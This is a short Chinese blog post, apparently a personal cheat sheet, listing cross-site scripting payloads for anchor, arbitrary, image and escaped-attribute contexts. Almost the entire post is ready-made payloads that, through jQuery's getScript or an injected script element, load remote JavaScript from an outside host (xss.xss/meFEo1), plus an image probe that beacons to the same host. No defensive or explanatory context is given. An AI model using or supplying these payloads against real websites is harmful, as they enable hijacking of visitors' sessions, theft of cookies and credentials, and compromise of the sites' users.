Goa

侠之大者,为国为民,侠之小者,为友为邻

xss 小总结 payload

发布于 2021-03-12 65 次阅读

标签集合

A标签依赖于jquery

<a onmouseover="$.getScript`//xss.xss/meFEo1`">xxs link</a>

任意标签依赖于jquery

<xxx tabindex=1  onfocus=$.getScript`//xss.xss/meFEo1`  autofocus></xxx>

图片标签原生

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//xss.xss/meFEo1';>

图片标签依赖于jquery

<img src="x" onerror=s=$.getScript`XSS地址`>

标签逃逸

编辑框逃逸依赖于jquery

onfocus=$.getScript`//xss.xss/meFEo1`  autofocus

img逃逸原生

x" onerror=s=createElement('script');body.appendChild(s);s.src='XSS地址';"

img逃逸依赖于jquery

x" onerror=s=$.getScript`xss地址`;"

探测

图片探针

<Img sRC=https://xss.xss/meFEo1/picc.jpg>

burpsuite获取token进行密码爆破

BeautifulSoup 爬虫小实列

Author

梦中

侠之大者,为国为民,侠之小者,为友为邻

查看评论 - NOTHING

Comments | NOTHING

暂无评论

取消回复

Markdown Supported while Forbidden

你是我一生只会遇见一次的惊喜 ...

戳我试试 OωO 嘿嘿嘿ヾ(≧∇≦*)ゝ

bilibili~	(=・ω・=)	Tieba

梦中博客

切换主题 | SCHEME TOOL